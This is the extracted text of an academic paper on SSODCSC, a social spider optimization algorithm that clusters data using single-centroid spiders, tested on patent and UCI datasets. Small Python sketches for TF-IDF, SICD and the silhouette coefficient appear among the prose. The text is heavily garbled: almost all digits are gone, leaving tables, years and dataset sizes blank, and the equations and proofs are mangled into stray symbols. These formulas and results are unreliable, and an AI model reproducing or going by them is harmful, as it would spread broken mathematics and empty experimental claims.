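        ordered by the sorted vocabulary of distinguishable terms."""
        vocab = sorted({term for doc in docs for term in doc})
        n = len(docs)                                   # total number of data instances
        # m: number of documents containing each term
        df = {term: sum(1 for doc in docs if term in doc) for term in vocab}
        idf = {term: math.log(n / df[term]) for term in vocab}   # eq. (4)
        vectors = []
        for doc in docs:
            tf = Counter(doc)                           # raw term counts for eq. (3)
            vectors.append([tf[term] * idf[term] for term in vocab])
        return vectors

    # tiny usage example with three toy "documents"
    vecs = tfidf_vectors([["spider", "cluster", "spider"],
                          ["centroid", "cluster"],
                          ["cluster", "data"]])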
contributions
in the last decade, nature-inspired algorithms have been successfully applied to np-hard clustering problems. in the state-of-the-art nature-inspired algorithms for clustering, each agent in the population is taken to be a collection of k clusters; the memory requirements and cpu times of these algorithms are therefore very high. these algorithms return the best agents, i.e., those in which the sicd (or the average icd) is minimized. in other words, the fitness of an agent is measured by considering all k clusters present in it as a whole. this, however, does not guarantee that every cluster individually has a low icd: even the globally best agent, with the best fitness, may contain some clusters with a very high icd. suppose ds = {dv1, dv2, ..., dv10}, k = 3, the number of agents is 4, and the contents of the agents are as shown in figs. - . according to all state-of-the-art nature-inspired algorithms, the best agent will be the one with the lowest sicd value; however, these algorithms give no assurance that its three clusters have the lowest individual icd. table 1 specifies the best three agents (spiders) returned by our proposed algorithm. the sicd value of this globally best solution is the sum of the three individual icd values, which is less than the sicd value of the globally best solution under the k-cluster representation of agents. therefore, the clustering results produced by state-of-the-art algorithms that use a k-centroid representation for agents may not be highly accurate. the proposed approach focuses not only on the sicd but also on the individual icd of the clusters. in our proposed algorithm, social spider optimization for data clustering using single centroid (ssodcsc), each spider is represented by a single centroid and the list of data instances close to it. this representation requires k times less memory than the representation used by other state-of-the-art nature-inspired algorithms such as sso, as shown below. each data instance in the dataset is given an identification number, and instead of storing the data instances themselves, we store their identification numbers (which are integer values) in the spiders.

figure . data instances present in agent 1.
figure . data instances present in agent 2.
figure . data instances present in agent 3.
figure . data instances present in agent 4.
memory required for storing an integer value representing identification number of a data instance = bytes. maximum memory required for storing the list of identification numbers of data instances closer to the centroid = � n bytes, where n is number of data instances present in the dataset. maximum memory required for a spider = � m + � n bytes therefore, total computational memory of ssodcsc = , � ( � m + � n) bytes. for sso: number of spiders used = number of iterations for best clustering results = total number of spiders to be computed = � = , memory required for storing a double value = bytes memory required for storing k centroids of a spider = � m � k bytes, where m is the number of dimensions present in the dataset. memory required for storing an integer value representing identification number of a data instance = bytes table the best three agents returned by ssodcsc. agent data vectors intra-cluster distance part of best solution? spider dv , dv , dv no spider dv , dv , dv no spider dv , dv , dv , dv no spider dv , dv , dv , dv , dv , dv yes spider dv , dv no spider dv , dv no spider dv , dv , dv , dv , dv no spider dv , dv yes spider dv , dv , dv no spider dv , dv , dv , dv , dv no spider dv , dv , dv no spider dv , dv yes thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ maximum memory required for storing k lists of identification numbers of data instances (where each list is associated with a centroid) = � n � k bytes, where n is the number of data instances present in the dataset, and k is the number of centroids present in each spider. maximum memory required for a spider = k�( � m + � n) bytes therefore, total computational memory of sso = , � k� ( � m + � n) bytes. the time required for initiating the spiders will be less in this representation. the average cpu time per iteration depends on the time required for computing fitness values and the time required for computing the next positions of the spiders in the solution space. the fitness values and next positions of spiders can be computed in less time with single centroid representation, so that the average cpu time per iteration reduces gradually. the proposed algorithm returns best k spiders such that the union of the lists of data instances present in them will produce exactly all of the data instances in ds. in the basic sso algorithm, non-dominant males are not allowed in the mating operation because of their low weight values. they do not receive any vibrations from other spiders and have no communication in the web, as the communication is established through vibration only (shukla & nanda, ). therefore, their presence in the solution space is questionable. moreover, their next positions are dependent on the existing positions of the dominant male spiders (cuevas et al., ). they cannot be part of the selected solution when dominant male spiders are in the solution space. in our proposed algorithm, ssodcsc, we convert them into dominant male spiders by increasing their weight values and then allowing them to participate in the mating operation to produce a new spider, better than the worst spider in the population. in sso, each dominant male mates with a set of females and produces a new spider. the weight of the new spider may or may not be greater than that of the worst spider. 
but as we make the weight of each non-dominant male spider greater than the average weight of the dominant male spiders in ssodcsc, the new spider produced by the non-dominant male spider is surely better than the worst spider. in other words, not only did we convert non-dominant male spiders into dominant male spiders, but also we made them more effective than the dominant male spiders. therefore, each spider receives vibrations from other spiders and has a chance at becoming a part of the selected solution, unlike in sso. at each iteration of ssodcsc, the population size is the same but the spiders with greater weight values are introduced in place of the worst spiders. as a result, the current solution given by ssodcsc moves toward the globally best solution as the number of iterations is increased. we applied ssodcsc on feature-based datasets and text datasets. this paper is organized as follows: “related work” describes the recent related work on solving clustering problems using nature-inspired algorithms, “proposed algorithm: ssodcsc” describes ssodcsc, “results” includes experimental results, and we conclude the paper with future work in the section “discussion.” related work shukla & nanda ( ) proposed two clustering algorithms based on the original version of sso and a parallel version of sso (p-sso). p-sso computes the next position of female thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ spiders, dominant male spiders, and non-dominant male spiders simultaneously in each iteration. they applied the two algorithms on low dimensional datasets, high dimensional datasets, overlapping datasets, and non-overlapping datasets, and found that the two algorithms are able to produce consistent clustering results as compared with other clustering algorithms. they designed a flood image segmentation application based on their proposed work and got two times better accuracy than the k-means when applied on nasa satellite images of flood affected areas of chennai. zhou et al. ( ), used the symbiotic organism search (sos) algorithm for solving clustering problems. the sos algorithm mimics the interactive behavior of the organisms in nature. in sos, new solutions are generated by imitating the biological interactions between two organisms in the ecosystem. sos implements three phases, namely, the mutualism phase, the commensalism phase, and the parasitism phase. in the mutualism phase, the organisms interact to increase their mutual survival advantage. in the commensalism phase, the interaction benefits one organism but does not impact the other. in the parasitism phase, the organism with better fitness will kill the other. the proposed algorithm produced better clustering results when compared with other algorithms with low dimensional datasets. however, the authors did not apply sos on high dimensional datasets. the algorithm suffers from an imbalance between exploration and exploitation due to its high randomness. nayak et al. ( ), hybridized the elicit teaching learning based optimization approach with the fuzzy c-means (fcm) clustering algorithm. at each iteration of elicit teaching learning-based optimization, the worst entities are replaced with the best entities in each cluster group. the best cluster centroids produced by elicit teaching learning based optimization are taken as the inputs for the fcm clustering algorithm. 
they found that the proposed algorithm produces clustering solutions of better fitness values when compared with other clustering algorithms. zhou et al. ( ), proposed a simplex method based social spider optimization (smsso) algorithm to overcome the drawbacks of sso, namely local optima entrapment and poor convergence rates. in the proposed algorithm, the spider with the worst fitness is replaced by a reflected or extended alternate spider so that the global search may be improved. the largest dataset used in the experiments has only dimensions. the proposed algorithm looks good with low dimensional datasets. it may not be as effective for high dimensional datasets as the simplex mechanism will become expensive for those datasets. the differences between smsso and our proposed algorithm ssodcsc are as follows: in smsso, the initial solution moves along the edges of the polytope until it reaches the optimal solution, in ssodcsc, the solution space will have spiders of better fitness values after every iteration. smsso supports the mating of dominant males only, but ssodcsc allows the mating of both dominant and non-dominant male spiders with female spiders. in smsso, the fitness of the new spider may or may not be better than that of the worst spider. in ssodcsc, the fitness of the new spider is always greater than that of the worst spider. in smsso, each spider is represented as a collection of k-centroids. in ssodcsc, each spider is represented as a single centroid. smsso returns the best spider, whereas ssodcsc returns a set of first k best spiders. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ han et al. ( ), proposed the bird flock gravitational search algorithm (bfgsa) to enable the gravitational search algorithm escape from sub optimal solutions. the authors used a concept called collective response of object reorientation to avoid stagnation. in that model, if the fitness of the global optimum remains the same in several subsequent iterations, the proposed algorithm defines the collective response of the object reorientation that updates the position of each object using the mean position of its nearest seven neighbors. the simulation results indicate that bfgsa can be used for both low and high dimensional datasets. the proposed algorithm convergences occur in iterations, which is relatively high when compared with other algorithms. jothi, mohanty & ojha ( ), proposed minimum spanning tree (mst) based clustering on the partition-based nearest neighbor graph for reducing the computational overhead. the proposed algorithm produces a sparse local neighborhood graph (lng) and then the approximate mst is constructed from lng. they showed that the proposed algorithm outperforms the traditional algorithms by reducing both the size and computational time to construct the lng. experiments are conducted on both synthetic and real datasets. chen et al. ( ), proposed a novel optimum-path forest (opf) clustering algorithm that can be used for remote sensing segmentation. they defined a probability density function using the principle that the cluster centers depend on their distances from samples with higher densities. they applied the proposed algorithm on five remote sensing land cover images. the clustering results show that the proposed algorithm outperforms the original opf approach. nayak et al. 
( ), proposed an improved firefly-based fuzzy c-means algorithm (improved fafcm) to resolve the drawbacks of the fcm algorithm (fcm) using firefly algorithm. they used the firefly algorithm to minimize the objective function value of the fcm algorithm. the output centroids of the firefly algorithm are passed to the fcm algorithm as initial centroids so that it refines them further. they found that an improved fafcm produces better clustering results as compared to fcm, particle swarm optimization (pso), and fafcm. de andrade silva, hruschka & gama ( ), proposed a fast evolutionary algorithm for clustering data streams (feac-stream). it is capable of estimating the number of clusters to be formed from data in an online fashion. the page–hinkley test is used by feac-stream to identify eventual degradation in the induced cluster quality. the proposed algorithm is based on the assumption that clusters provide useful information about the dynamics of the data stream. they applied the proposed algorithm on synthetic and real-world data streams and showed that the proposed algorithm produces better clustering results than other algorithms. costa et al. ( ), proposed a nature-inspired approach for data clustering based on the optimum-path forest algorithm (opfc). opfc accepts a graph representation of the dataset. the nodes of the graph are samples and each sample is connected to its k-nearest neighbors. each node has a weight. the weight is its probability density function value, which is computed using its distances from l k-nearest neighbors. after the k-nn graph is thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ constructed, opfc finds roots which are the nodes with the maximum of probability density function values and propagates one optimum-path cluster from each root to the remaining nodes in the graph. alswaitti, albughdadi & isa ( ), presented a novel approach for data clustering based on particle swarms. for balancing exploitation and exploration, they used the kernel density estimation technique and estimated multidimensional gravitational learning coefficients. the kernel density estimation technique is used for avoiding premature convergence. they showed that the proposed algorithm produces better accuracy and better cluster compactness than other clustering algorithms when applied on benchmark datasets from the uci machine learning repository. proposed algorithm: ssodcsc social spider optimization is based on the cooperative behavior of social spiders for obtaining a common food. they are classified into two types, namely male spiders and female spiders (cuevas et al., ). nearly % of the population is female. each spider is characterized by its position, fitness, weight, and vibrations received from other spiders (thalamala, reddy & janet, ). in k-centroid representation, each spider has k-centroids which are associated with a list of data instances closer to it as shown in fig. a. in ssodcsc, each spider has two components, namely a centroid and a list of identification numbers of data instances closer to it, as shown in fig. b. the number of data instances close to the centroids of spiders may be different, the length of each spider may be different; however, the length of the centroid component of each spider is fixed. therefore, we used only centroid components of the spiders to specify their position in the solution space. 
when the spiders move in the solution space, only the centroid components are moved or updated. the new list of identification numbers of data instances may be found to be closer to the centroid, depending on its new location. we use the terms spider, position of spider, and centroid component of spider interchangeably in this article. the fitness of a spider is the sum of the distances of its data instances from its centroid. the weights of the spiders are computed based on their fitness values. figure (a) k-cluster representation of a spider; (b) single cluster representation of a spider. the figure specifies the components of a spider in k-cluster and single cluster representations. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in ssodcsc, the weight of a spider is inversely proportional to the fitness value of the spider. a spider with the first largest weight (first smallest fitness) is known as the globally best spider s gbs. in this paper, we use the notations s gbs and sgbs interchangeably. in ssodcsc, s gbs will have the largest weight and lowest value for the sum of the distances of data instances from the centroid. the spider with the least weight (largest fitness value) is known as worst spider sws, as shown in fig. . in ssodcsc, sws will have the least weight and largest value for the sum of the distances of the data instances from the centroid. each spider receives vibrations from the globally best spider sgbs, the nearest better spider snbs, and the nearest female spider snfs. the male spiders are classified into two types, namely dominant males and non-dominant males. the weight of a dominant male spider is greater than or equal to the median weight of male spiders (cuevas & cienfuegos, ) as shown in fig. . the male spiders that are not dominant males are called non-dominant males. a female spider can either attract or repulse other spiders. the weight of a spider s can be computed using eq. ( ). the lower the sum of the distances (i.e., fitness), the higher the weight of the spider will be in ssodcsc. weight ½s� ¼ fitness sð Þ � fitness swsð Þ fitness sgbs � � � fitness swsð Þ ( ) the ssodcsc algorithm returns spiders s gbs, s gbs ... and s k gbs that have the first k largest weight values (first k smallest fitness values) such that the union of the data instances present in them will give exactly all of the data instances present in the dataset. we used a two-dimensional array, namely spider, to store the centroid components of figure spiders on the scale of weight values. full-size doi: . /peerj-cs. /fig- figure male spiders on the scale of weight values. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ all spiders. for example, in the case of the iris dataset, the centroid component of first spider is stored in spider [ , ], spider [ , ], spider [ , ], and spider [ , ], as iris has four dimensions. the number of spiders returned by ssodcsc depends on the number of clusters inherently present in the dataset. for example, in the case of the iris dataset, though we use spiders, the algorithm returns the first best, second best, and third best spiders only, because the iris dataset inherently has three clusters. 
in the following subsections, we explain how the spiders are initialized in the solution space, the data instances are assigned to them, the next positions of the spiders are found, and the mating operation produces a new spider. initialization social spider optimization for data clustering using single centroid starts with the initialization of spiders in the solution space. initially all spiders are empty. the fitness of each spider is set to , and the weight is set to . each spider s is initialized with a random centroid using eq. ( ). spider ½s;d� ¼ lowerboundðdÞ þ randomð ; Þ � ðupperboundðdÞ � lowerboundðdÞÞ ( ) where spider [s, d] is dth dimension of the centroid of spider s, lowerbound (d) and upperbound (d) are the smallest and largest values of the dth dimension of the dataset, respectively. assignment of data instances the distances of each data instance from the centroids of all spiders are calculated using the euclidean distance function. a data instance is assigned to the spider that contains its nearest centroid. next positions of spiders the spiders are moved across the solution space in each iteration of ssodclc based on their gender. the movement of a spider in the solution space depends on the vibrations received from other spiders. the intensity of the vibrations originated from spider sj to spider si can be found using eq. ( ) and depends on the distance between the two spiders and the weight of spider sj. vibrations si; sj � � ¼ weight sj � � � e�distance si;sjð Þ ( ) next positions of female spiders the movement of a female spider sf depends on the vibrations from the globally best spider sgbs and its nearest better spider snbs as shown in fig. . to generate the next position of a female spider sf, a random number is generated and if it is less than the threshold probability (tp), the female spider attracts other spiders and the position of it is calculated according to eq. ( ). if not, it repulses other spiders and the position of it calculated according to eq. ( ). in eqs. ( ) and ( ), a, β, c, and d are random numbers from the interval [ , ]. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ spider ½sf ; d� ¼ spider ½sf ; d� þ a � spider ½sf ; d� � spider ½sgbs; d� � � � weight ½sgbs� � e�distanceðsf ;sgbsÞ þ b � spider ½sf ; d� � spider ½snbs; d� � � � weight ½snbs� � e�distanceðsf ;snbsÞ þ g � ðd � : Þ ( ) spider ½sf ; d� ¼ spider ½sf ; d� þ a � spider ½sf ; d� � spider ½sgbs; d� � � � weight ½sgbs� � e�distanceðsf ;sgbsÞ � b � spider ½sf ; d� � spider ½snbs; d� � � � weight ½snbs� � e�distanceðsf ;snbsÞ þ g � ðd � : Þ ( ) next position of male spiders the solution space consists of female spiders and male spiders. when data instances are added or removed from them, their fitness values and weight values will change. if the current weight of a male spider is greater than or equal to the median weight of dominant male spiders, it will be considered to be a dominant male spider. the male spiders that are not dominant male spiders are called non-dominant male spiders. the next position of a dominant male sdm can be calculated using eq. ( ). spider ½sdm; d� ¼spider ½sdm; d� þ a � spider ½sdm; d� � spider ½snfs; d� � � � weight ½snfs� � e�distanceðsdm; snfsÞ þ g � ðd � : Þ ( ) the position of the spider depended only on the vibrations received from its nearest female spider snfs. the pictorial representation of this is specified in fig. . 
the weighted mean of the male population, w, can be obtained using eq. ( ). let nf be the total number of female spiders in the spider colony and nm be the total number of male spiders. then the female spiders can be named as sf ; sf ; sf ; . . . . . . ::; sfnf and the male spiders can be named as sm ; sm ; sm ; . . . . . . ::; smnm. figure next position of a female spider in ssodcsc. the figure specifies how the next position of a female spider is calculated in ssodcsc. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ w ¼ pnm i¼ spider smi; d½ � � weight smið Þpnm i¼ �weight smið Þ ( ) the next position of the non-dominant male spider sndm can be calculated using eq. ( ) and depends on the weighted mean of the male population. spider ½sndm; d� ¼ spider ½sndm; d� þ a � w ( ) mating operation each dominant male spider mates with a set of female spiders within the specified range of mating to produce a new spider, as shown in fig. . the new spider will be generated using the roulette wheel method (chandran, reddy & janet, ). if the weight of the new spider is better than the weight of worst spider, then the worst spider would be replaced by the new spider. the range of mating r is calculated using eq. ( ). r ¼ diff � n ( ) figure next position of a dominant male spider in ssodcsc. the figure specifies how the next position of a dominant male spider is calculated in ssodcsc. full-size doi: . /peerj-cs. /fig- figure mating of a dominant male spider in ssodcsc. the figure specifies how a dominant male spider mates with a set of female spiders to produce a new spider in ssodcsc. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where diff is the sum of differences of the upper bound and lower bound of each dimension, and n is the number of dimensions of the dataset ds. in sso, the non-dominant male spiders are not allowed to mate with female spiders, as they would produce new spiders having low weights. in ssodcsc, a non-dominant male spider is converted into dominant male spider by making sure that its weight becomes greater than or equal to the average weight of dominant male spiders so that it participates in the mating process and produces a new spider whose weight is better than that of at least one other spider. the theoretical proof for the possibility of converting a non-dominant male spider into a dominant male spider is provided in theorem . thus, non-dominant male spiders become more powerful than dominant male spiders as they are made to produce new spiders that surely replace worst spiders in the population. the theoretical proof for the possibility of obtaining a new spider that is better than the worst spider, after a non-dominant male spider mates with the female spiders is provided in theorem . the following steps are used to convert a non-dominant male spider into a dominant male spider: step : create a list consisting of data instances of the non-dominant male spider sndm in the decreasing order of their distances from its centroid. step : delete the top-most data instance (i.e., the data instance which is the greatest distance from the centroid) from the list. step : find the weight of the non-dominant male spider sndm. 
step : if the weight of non-dominant male is less than the average weight of dominant male spiders, go to step . the flowchart for ssodcsc is specified in fig. . theorem . a non-dominant male spider can be converted into a dominant male spider in single centroid representation of sso. proof: let sndm be the non-dominant male spider whose weight is wndm. let medwgt be the median weight of male spiders (which is always less than or equal to ). but according to definition of the non-dominant male spider, wndm < medwgt ( ) assume that the theorem is false. ⇒ sndm can not be converted into a dominant male spider ⇒ during the movement of sndm in the solution space, wndm < ( ) let sum be the sum of distances of data instances from the centroid of sndm. if the data instance that is the furthest distance from the centroid of sndm is removed from sndm, then ⇒ sum of distances of data instances from the centroid of sndm will decrease, as sum = sum-distance of removed data instance from the centroid of sndm. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ⇒ fitness of sndm will decrease, as fitness of sndm is proportional to sum ⇒ the weight of sndm will increase as the weight of sndm is inversely proportional to fitness of sndm similarly, if a data instance is added to sndm, then ⇒ sum of distances of data instances from centroid of sndm will increase. ⇒ fitness of sndm will increase. ⇒ the weight of sndm will decrease. therefore, wndm ¼ � xn i¼ wdi ( ) where is the initial weight of sndm, n is the total number of data instances added to sndm, and wdi is the decrease in the weight of sndm when ith data instance was added to sndm. when all the data instances are removed from sndm, wndm ¼ wndm þ xn i¼ wdi ¼ � xn i¼ wdi þ xn i¼ wdi ( ) but according to eq. ( ), wndm can never be during the movement of sndm in the solution space. hence, our assumption is wrong. so, we can conclude that a non-dominant male spider can be converted into dominant male spider in single centroid representation of sso. theorem . the weight of the new spider resulting from the mating of a non-dominant male spider with a weight greater than or equal to the average weight of dominant male spiders will be better than at least one spider in the population. proof: let sndm be the non-dominant male spider whose weight became greater than or equal to the average weight of dominant male spiders. let sf ; sf ; sf ; . . . . . . ::; sfm be female spiders that participated in the mating. let snew be the resulting new spider of the mating operation. let n be the total number of spiders in the colony. assume that the theorem is false. it implies: pn i¼ weight sið Þ � weight snewð Þ? : ¼ ( ) in other words, the total number of spiders whose weight is less than or equal to that of snew is zero. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ but according to the roulette wheel method: snew ¼ pm i¼ sfi � weight sfi � �� � þ sndm � weight sndmð Þpm i¼ weight sfi � �� � þ weight sndmð Þ ( ) ⇒ lim weight sfið Þ! ^weight sndmð Þ! snew = sndm with weight equal to = sgbs (since any spider whose weight is is always sgbs) and lim weight sfið Þ! ^weight sndmð Þ! snew ¼ m female spiders whose weight is ð Þ þ sndm whose weight is ð Þ m þ ¼ m þ ð Þ � sgbs m þ ¼ sgbs so, when weight sfi � � tends to , and weight (sndm) tends to , snew becomes sgbs. 
when weight sfi � � tends to , and weight (sndm) (sndm) tends to , snew becomes sgbs. similarly, when weight sfi � � tends to , and weight (sndm) tends to , snew becomes sgbs. substituting sgbs in place of snew in eq. ( ), xn i¼ weight sið Þ � weight sgbs � � ? : ¼ ( ) according to eq. ( ), the number of spiders whose weight is less than or equal to the weight of sgbs is zero. but according to the definition of sgbs, its weight is greater than or equal to the weights of all remaining spiders. so, there are spiders whose weights are less than or equal to the weight of sgbs. therefore eq. ( ) is false. hence, our assumption is wrong. therefore, we can conclude that the weight of snew produced by sndm is greater than that of at least one spider in the population. results the proposed algorithm and the algorithms used in the comparison were implemented in the java run time environment, version . . . , and the experiments were run on intel xeon cpu e v with a . -ghz processor with a gb ram. the windows professional operating system was used. applying ssodcsc on patent datasets at first, we applied ssodcsc on six patent corpus datasets. the description of the data sets is given in table . patent corpus contains , text documents with technical descriptions of the patents that belong to different classes. each class has exactly text documents. each text document contains only a technical description of the patent. all text documents were prepared using the ascii format. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as ssodcsc returned k best spiders, the sicd of clusters in those spiders was calculated. table specifies the clustering results of ssodcsc when applied on patent corpus datasets. for each dataset the sicd value, cosine similarity value, f-measure value and accuracy obtained were specified. table specifies the relationship between the sicd values and number of iterations. lower sicd value indicate a higher clustering quality. it was found that as we increased the number of iterations, the sicd decreased and thereby, the clustering quality increased. figure flowchart of ssodcsc. the flowchart specifies the various steps in ssodcsc. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to find the distance between data instances, we used the euclidean distance function and manhattan distance function. data instances having small differences were placed in same cluster by the euclidean distance function, as it ignores the small differences. table description of patent corpus datasets. patent corpus patent corpus patent corpus patent corpus patent corpus patent corpus number of text documents number of clusters table clustering results of ssodcsc: patent corpus datasets. dataset sicd cosine similarity f-measure accuracy patent corpus , . . . . patent corpus , . . . . patent corpus , . . . . patent corpus , . . . . patent corpus , . . . . patent corpus , . . . . table relationship between sicd and number of iterations: ssodcsc: patent corpus datasets. dataset iterations iterations iterations iterations iterations patent corpus , . , . , . , . , . patent corpus , . , . , . , . , . patent corpus , . , . , . , . , . patent corpus , . , . , . , . , . patent corpus , . , . , . , . , . patent corpus , . , . , . , . , . note: the best values are specified in bold. 
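for reference, the sicd (sum of intra-cluster distances) values reported in the tables above can be computed directly from the final centroids: every data instance contributes the euclidean distance to its nearest centroid, and a lower total indicates tighter clusters. the sketch below is an illustrative reconstruction, not the evaluation code used in the experiments:

import numpy as np

def sicd(data, centroids):
    # sum of distances of all data instances from their nearest centroid;
    # a lower value indicates a higher clustering quality
    dists = np.linalg.norm(data[:, None, :] - np.asarray(centroids)[None, :, :], axis=2)
    return float(dists.min(axis=1).sum())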
table comparison between distance functions: ssodcsc: patent corpus datasets. dataset euclidean distance function manhattan distance function accuracy avg. cosine similarity accuracy avg. cosine similarity patent corpus . . . . patent corpus . . . . patent corpus . . . . . patent corpus . . . . patent corpus . . . . patent corpus . . . . note: the best values are specified in bold. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it was found that ssodcsc produced a slightly better clustering result with the euclidean distance function as shown in table . table specifies the comparison between clustering algorithms with respect to sicd values. table specifies the comparison between clustering algorithms with respect to accuracy. ssodcsc produces better accuracy for all datasets. the overall percentage increase in the accuracy is approximately %. the silhouette coefficient sc of a data instance di can be calculated using eq. ( ). sc ¼ b � a max a; bð Þ ( ) where a is the average of distances between data instance di and other data instances present in its containing cluster, and b is the minimum of distances between data instance table comparison between clustering algorithms in terms of sicd: patent corpus datasets. dataset k-means pso ga abc ibco aco smsso bfgsa sos sso ssodcsc patent corpus , . , . , . , . , . , . , . , . , . , . , . patent corpus , . , . , . , . , . , . , . , . , . , . , . patent corpus , . , . , . , . , . , . , . , . , . , . , . patent corpus , . , . , . , . , . , . , . , . , . , . , . patent corpus , . , . , . , . , . , . , . , . , . , . , . patent corpus , . , . , . , . , . , . , . , . , . , . , . note: the best values are specified in bold. table comparison of clustering algorithms in terms of accuracy: patent corpus datasets. dataset k-means pso ga abc ibco aco smsso bfgsa sos sso ssodcsc patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . note: the best values are specified in bold. table average silhouette coefficient value: patent corpus datasets. dataset k-means pso ga abc ibco aco smsso bfgsa sos sso ssodcsc patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . patent corpus . . . . . . . . . . . note: the best values are specified in bold. thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ di and data instances present in other clusters. the range of the silhouette coefficient is [- , ]. when it is closer to , better clustering results will be produced. table specifies the comparison between clustering algorithms with respect to the average silhouette coefficient values of datasets. ssodcsc produces better average silhouette coefficient values for all patent corpus datasets. from figs. to , it is obvious that ssodcsc produces the largest inter-cluster distances and smallest icd for patent corpus datasets. applying ssodcsc on uci datasets we applied ssodcsc on uci data sets as well. the description of the data sets is given in table . table specifies the relationship between sicd values and the number of iterations. as we increase the number of iterations, the sicd is also reduced. 
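the silhouette coefficient used in these comparisons can be computed as follows; the sketch follows the definition given above (a is the average distance to the other instances of the same cluster, b is the minimum distance to instances of other clusters), and the function name is an assumption for illustration:

import numpy as np

def average_silhouette(data, labels):
    # mean of (b - a) / max(a, b) over all data instances; values closer
    # to 1 indicate a better clustering
    data, labels = np.asarray(data, dtype=float), np.asarray(labels)
    scores = []
    for i in range(len(data)):
        dists = np.linalg.norm(data - data[i], axis=1)
        same = labels == labels[i]
        same[i] = False                       # exclude the instance itself
        if not same.any():                    # singleton cluster: skip
            continue
        a = dists[same].mean()                # average distance within the cluster
        b = dists[labels != labels[i]].min()  # nearest instance in another cluster
        scores.append((b - a) / max(a, b))
    return float(np.mean(scores))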
for the iris dataset, the sicd value is . at iterations but as we increase the number of iterations, the sicd value of the clustering result also decreases until it reaches . at iterations. however, it remains at . , after iterations and it becomes obvious that ssodcsc converges in iterations. table specifies the best three spiders for the iris dataset. we initialized a solution space with spiders, among which, the first spiders were females and the remaining were males. our proposed algorithm returned spider , spider , and spider . spider and spider were females and spider was a male spider. the centroids of these spiders were ( . , . , . , . ), ( . , . , . , . ), and ( . , . , . , . ), respectively. these centroids have four values as iris dataset consists of four figure inter-cluster distances: patent corpus datasets. the figure specifies inter-cluster dis- tances returned by clustering algorithms when applied on patent corpus datasets. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ attributes. the sum of the distances between the data instances present in the iris dataset and their nearest centroids in table was found to be . , as shown in table . table specifies the best six spiders for vowel dataset. our proposed algorithm returned spider , spider , spider , spider , spider , and spider . spider , spider , spider , and spider were females, and spiders and spider were male spiders. the sum of the distance between the data instances present in the vowel data set and their nearest centroids in table was found to be , . , as shown in table . table specifies the best three spiders for the cmc dataset. our proposed algorithm returned spider , spider , and spider among which spider and spider figure intra-cluster distances: patent corpus datasets. the figure specifies intra-cluster dis- tances returned by clustering algorithms when applied on patent corpus datasets. full-size doi: . /peerj-cs. /fig- table description of uci datasets. dataset number of classes number of attributes number of instances iris wine glass vowel cancer cmc , haberman bupa thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ were females and spider was a male spider. the centroids of these spiders are specified. these centroids had nine values as the cmc dataset consists of nine attributes. the sum of the distance between the , data instances present in the cmc data set and their nearest centroids in table was found to be , . , as shown in table . tables and specify the best spiders and their centroids for the glass and wine datasets, respectively. the sum of the distances between the data instances present in the glass dataset and their nearest centroids in table was found to be equal to . , as shown in table . if we find the sum of the distances between the data instances present in the wine dataset and their nearest centroids in table , it would be equal to , . , as shown in table . table relationship between sicd and number of iterations: ssodcsc: uci datasets. dataset iterations iterations iterations iterations iterations iris . . . . . vowel , . , . , . , . , . cmc , . , . , . , . , . glass . . . . . wine , . , . , . , . , . note: the best values are specified in bold. table best three spiders of iris dataset: ssodcsc. 
